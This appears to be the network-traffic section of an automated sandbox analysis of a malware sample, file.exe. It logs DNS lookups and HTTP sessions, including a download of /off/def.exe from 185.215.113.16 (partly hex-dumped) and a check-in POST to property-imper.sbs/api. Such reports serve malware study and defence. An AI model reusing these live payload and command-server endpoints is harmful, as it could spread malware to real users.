                                                                                                                                                                        Nov 24, 2024 05:13:20.954792023 CET50116443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:20.954812050 CET4435011613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:20.954823017 CET50116443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:20.954830885 CET4435011613.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:21.860649109 CET4435011713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:21.861236095 CET50117443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:21.861253023 CET4435011713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:21.862818956 CET50117443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:21.862823963 CET4435011713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:21.888983011 CET4435011813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:21.889481068 CET50118443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:21.889503956 CET4435011813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:21.889928102 CET50118443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:21.889933109 CET4435011813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:21.909090996 CET4435011913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:21.909430981 CET50119443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:21.909451008 CET4435011913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:21.909836054 CET50119443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:21.909842014 CET4435011913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:22.174242973 CET4435012013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:22.174797058 CET50120443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:22.174833059 CET4435012013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:22.175297022 CET50120443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:22.175306082 CET4435012013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:22.304893017 CET4435011713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:22.308015108 CET4435011713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:22.310903072 CET50117443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:22.310946941 CET50117443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:22.310970068 CET4435011713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:22.310983896 CET50117443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:22.310990095 CET4435011713.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:22.332216024 CET4435011813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:22.335434914 CET4435011813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:22.335504055 CET50118443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:22.335577965 CET50118443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:22.335592985 CET4435011813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:22.335619926 CET50118443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:22.335625887 CET4435011813.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:22.354329109 CET4435011913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:22.357445955 CET4435011913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:22.357516050 CET50119443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:22.357553005 CET50119443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:22.357572079 CET4435011913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:22.357582092 CET50119443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:22.357588053 CET4435011913.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:22.617480993 CET4435012013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:22.617552042 CET4435012013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:22.617809057 CET50120443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:22.617871046 CET50120443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:22.617871046 CET50120443192.168.2.713.107.246.63
                                                                                                                                                                        Nov 24, 2024 05:13:22.617896080 CET4435012013.107.246.63192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:22.617911100 CET4435012013.107.246.63192.168.2.7
                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Nov 24, 2024 05:11:18.126296997 CET4944153192.168.2.71.1.1.1
                                                                                                                                                                        Nov 24, 2024 05:11:18.385585070 CET53494411.1.1.1192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:19.350102901 CET123123192.168.2.740.81.94.65
                                                                                                                                                                        Nov 24, 2024 05:11:20.706159115 CET12312340.81.94.65192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:53.528707027 CET53536531.1.1.1192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:53.694211960 CET53521241.1.1.1192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:56.382533073 CET53549111.1.1.1192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:57.869769096 CET6358453192.168.2.71.1.1.1
                                                                                                                                                                        Nov 24, 2024 05:11:57.870055914 CET4925753192.168.2.71.1.1.1
                                                                                                                                                                        Nov 24, 2024 05:11:58.006984949 CET53635841.1.1.1192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:11:58.007258892 CET53492571.1.1.1192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:00.193109989 CET5017653192.168.2.71.1.1.1
                                                                                                                                                                        Nov 24, 2024 05:12:00.193433046 CET4977153192.168.2.71.1.1.1
                                                                                                                                                                        Nov 24, 2024 05:12:03.609180927 CET5370953192.168.2.71.1.1.1
                                                                                                                                                                        Nov 24, 2024 05:12:03.609488010 CET4966553192.168.2.71.1.1.1
                                                                                                                                                                        Nov 24, 2024 05:12:10.339709997 CET53613991.1.1.1192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:12.574516058 CET5128753192.168.2.71.1.1.1
                                                                                                                                                                        Nov 24, 2024 05:12:12.574692011 CET5000053192.168.2.71.1.1.1
                                                                                                                                                                        Nov 24, 2024 05:12:13.106494904 CET138138192.168.2.7192.168.2.255
                                                                                                                                                                        Nov 24, 2024 05:12:13.604991913 CET53593981.1.1.1192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:32.519385099 CET53601931.1.1.1192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:53.330207109 CET53497211.1.1.1192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:12:55.364295959 CET53648721.1.1.1192.168.2.7
                                                                                                                                                                        Nov 24, 2024 05:13:12.589329958 CET5660053192.168.2.71.1.1.1
                                                                                                                                                                        Nov 24, 2024 05:13:12.589493990 CET5947453192.168.2.71.1.1.1
                                                                                                                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                        Nov 24, 2024 05:12:00.645925045 CET192.168.2.71.1.1.1c2c4(Port unreachable)Destination Unreachable
                                                                                                                                                                        Nov 24, 2024 05:12:19.029480934 CET192.168.2.71.1.1.1c267(Port unreachable)Destination Unreachable
                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                        Nov 24, 2024 05:11:18.126296997 CET192.168.2.71.1.1.10xa438Standard query (0)property-imper.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:11:57.869769096 CET192.168.2.71.1.1.10x68d3Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:11:57.870055914 CET192.168.2.71.1.1.10x4100Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:00.193109989 CET192.168.2.71.1.1.10xf2a5Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:00.193433046 CET192.168.2.71.1.1.10x6678Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:03.609180927 CET192.168.2.71.1.1.10x6751Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:03.609488010 CET192.168.2.71.1.1.10xba98Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:12.574516058 CET192.168.2.71.1.1.10xaea3Standard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:12.574692011 CET192.168.2.71.1.1.10x704bStandard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:13:12.589329958 CET192.168.2.71.1.1.10xb55dStandard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:13:12.589493990 CET192.168.2.71.1.1.10x4b67Standard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                        Nov 24, 2024 05:11:18.385585070 CET1.1.1.1192.168.2.70xa438No error (0)property-imper.sbs104.21.33.116A (IP address)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:11:18.385585070 CET1.1.1.1192.168.2.70xa438No error (0)property-imper.sbs172.67.162.84A (IP address)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:11:58.006984949 CET1.1.1.1192.168.2.70x68d3No error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:11:58.007258892 CET1.1.1.1192.168.2.70x4100No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:00.335767984 CET1.1.1.1192.168.2.70xf2a5No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:00.335767984 CET1.1.1.1192.168.2.70xf2a5No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:00.335767984 CET1.1.1.1192.168.2.70xf2a5No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:00.335767984 CET1.1.1.1192.168.2.70xf2a5No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:00.597620010 CET1.1.1.1192.168.2.70xf4aNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:00.645829916 CET1.1.1.1192.168.2.70x6678No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:00.645829916 CET1.1.1.1192.168.2.70x6678No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:00.709754944 CET1.1.1.1192.168.2.70xe10fNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:00.709754944 CET1.1.1.1192.168.2.70xe10fNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:00.709754944 CET1.1.1.1192.168.2.70xe10fNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:03.747423887 CET1.1.1.1192.168.2.70xba98No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:03.747423887 CET1.1.1.1192.168.2.70xba98No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:03.748790979 CET1.1.1.1192.168.2.70x6751No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:03.748790979 CET1.1.1.1192.168.2.70x6751No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:03.748790979 CET1.1.1.1192.168.2.70x6751No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:03.748790979 CET1.1.1.1192.168.2.70x6751No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:03.809716940 CET1.1.1.1192.168.2.70x80daNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:03.809716940 CET1.1.1.1192.168.2.70x80daNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:03.809716940 CET1.1.1.1192.168.2.70x80daNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:03.810481071 CET1.1.1.1192.168.2.70x7361No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:12.974745989 CET1.1.1.1192.168.2.70xaea3No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:12.979326010 CET1.1.1.1192.168.2.70x704bNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:18.954695940 CET1.1.1.1192.168.2.70xf9feNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:19.026510000 CET1.1.1.1192.168.2.70xf89aNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:25.705854893 CET1.1.1.1192.168.2.70x11bNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:12:25.706762075 CET1.1.1.1192.168.2.70xe815No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:13:12.727945089 CET1.1.1.1192.168.2.70x4b67No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Nov 24, 2024 05:13:12.819014072 CET1.1.1.1192.168.2.70xb55dNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        • property-imper.sbs
                                                                                                                                                                        • otelrules.azureedge.net
                                                                                                                                                                        • slscr.update.microsoft.com
                                                                                                                                                                        • https:
                                                                                                                                                                          • js.monitor.azure.com
                                                                                                                                                                          • wcpstatic.microsoft.com
                                                                                                                                                                        • fs.microsoft.com
                                                                                                                                                                        • 185.215.113.16
                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        0192.168.2.749761185.215.113.16807416C:\Users\user\Desktop\file.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Nov 24, 2024 05:11:40.072647095 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Host: 185.215.113.16
                                                                                                                                                                        Nov 24, 2024 05:11:41.413022041 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:41 GMT
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        Content-Length: 2741760
                                                                                                                                                                        Last-Modified: Sun, 24 Nov 2024 04:06:45 GMT
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        ETag: "6742a655-29d600"
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2a 00 00 04 00 00 0e 25 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                        Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$@* `@ *%*`Ui` @ @.rsrc`2@.idata 8@gvbjqmpu)v):@pcqkcyiw *)@.taggant@@*")@
                                                                                                                                                                        Nov 24, 2024 05:11:41.413053989 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:
                                                                                                                                                                        Nov 24, 2024 05:11:41.413064957 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:
                                                                                                                                                                        Nov 24, 2024 05:11:41.413075924 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:
                                                                                                                                                                        Nov 24, 2024 05:11:41.413085938 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:
                                                                                                                                                                        Nov 24, 2024 05:11:41.413090944 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:
                                                                                                                                                                        Nov 24, 2024 05:11:41.413098097 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii:
                                                                                                                                                                        Nov 24, 2024 05:11:41.413196087 CET1236INData Raw: 36 3f b1 cb de 9c b7 00 55 eb b1 88 65 b1 0c db 39 58 1a 2b f8 c6 05 6b a9 21 e4 09 0f a6 7b 30 fd b3 5d af 14 84 3a eb 2d 6c ec d0 04 fa a7 0b 48 22 d0 da 8c 35 a5 16 56 c4 b2 14 46 2a 69 3d 44 3d c0 ca de 28 bc f2 fa d1 d0 10 68 db b2 bb 9c 14
                                                                                                                                                                        Data Ascii: 6?Ue9X+k!{0]:-lH"5VF*i=D=(h/%DTT>36]0R?9As;hb:(&#t(_TxR"NL=Cc_8J28d=W'9X|)+I7CuUCkiXS>=nHp
                                                                                                                                                                        Nov 24, 2024 05:11:41.413207054 CET1236INData Raw: ca 30 ca f0 22 30 ce 2c 39 0b 51 d1 5f d3 cb 59 97 cb c7 d4 e6 c6 e5 29 a8 a8 ed c0 42 f3 bd cb 98 cb fd 2a 36 93 01 ce 31 06 3c 49 41 30 0a cb 98 9f c9 98 e6 f7 19 df f4 5c 27 95 9a d3 25 32 e8 d4 5d b5 5f bf b4 42 41 b3 d5 cb d8 24 3e b9 d0 7b
                                                                                                                                                                        Data Ascii: 0"0,9Q_Y)B*61<IA0\'%2]_BA$>{EM-20VW+rGOHRG$DOxgfp+zg^#';F?k3J]='V#hB+N2'0ZN3+f"2_^s.B7k+S'
                                                                                                                                                                        Nov 24, 2024 05:11:41.413216114 CET1236INData Raw: 81 dd c0 c1 ec fb c9 3d 85 88 79 cb 4d 17 ba 5f 52 06 c8 98 92 20 ee 61 5d 99 fa e9 f3 1b 1c 6f fb c8 fb 9b 54 bc ef 0f c7 9a 9c 3e b8 25 fd 71 87 33 1e fb 62 96 38 ed 48 03 24 ed f7 e6 19 b6 d0 20 16 da 46 9a 0d c4 51 6d 5d cc da 40 e0 bc 15 09
                                                                                                                                                                        Data Ascii: =yM_R a]oT>%q3b8H$ FQm]@gj:b!t9hhHaN9 23G@X-bQT%-x@-+EE&7l\00*2ya.JSU;A~RkoD:Fg
                                                                                                                                                                        Nov 24, 2024 05:11:41.532793999 CET1236INData Raw: 59 e8 90 65 af 27 ab 34 b4 5b ac 0f 7b 07 e8 2b 64 20 b4 8b 64 27 0a 39 67 cd 95 e1 61 28 97 dc 64 37 0c c7 97 24 58 7e e4 1c a6 92 83 76 c4 59 98 71 21 c0 81 95 d1 08 98 05 b8 ff fa e4 15 c7 6a 92 17 ce f4 e6 08 1a 17 d0 b6 7b 27 8a 1a 8e f8 1b
                                                                                                                                                                        Data Ascii: Ye'4[{+d d'9ga(d7$X~vYq!j{'ri>?;f\H(U #J<uO%j=z6g.-^`=R2#sU<^3;RFW0snJ|,cQ[n5D5d5


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        0192.168.2.749703104.21.33.1164437416C:\Users\user\Desktop\file.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:19 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                        Host: property-imper.sbs
                                                                                                                                                                        2024-11-24 04:11:19 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                                        2024-11-24 04:11:20 UTC1013INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:20 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=v8or2m2rte6j0bntimp9kld385; expires=Wed, 19-Mar-2025 21:57:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4u2Y%2F324aQaRnojc1HpWsqeKj9dqb8Bvy%2FZjdn1qpC%2BYst7u3yvmx45fhoDlWc2amgeuY0inrienyh8Q09ntxL4qdObH48ZdZfFZpw8QbHrAqjL6I5AoVjvfdOkikZeZAq94LXQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8e768de9c874c3fd-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1706&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1714621&cwnd=178&unsent_bytes=0&cid=7279c9b9dce2957a&ts=715&x=0"
                                                                                                                                                                        2024-11-24 04:11:20 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                        Data Ascii: 2ok
                                                                                                                                                                        2024-11-24 04:11:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        1192.168.2.74970413.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:11:20 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:11:21 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:11:20 GMT
                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                        Content-Length: 218853
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public
                                                                                                                                                                        Last-Modified: Sat, 23 Nov 2024 12:15:37 GMT
                                                                                                                                                                        ETag: "0x8DD0BB889D4282C"
                                                                                                                                                                        x-ms-request-id: 19b35b80-c01e-0049-150a-3eac27000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041120Z-174c587ffdf6b487hC1TEBydsn00000003tg00000000g4as
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
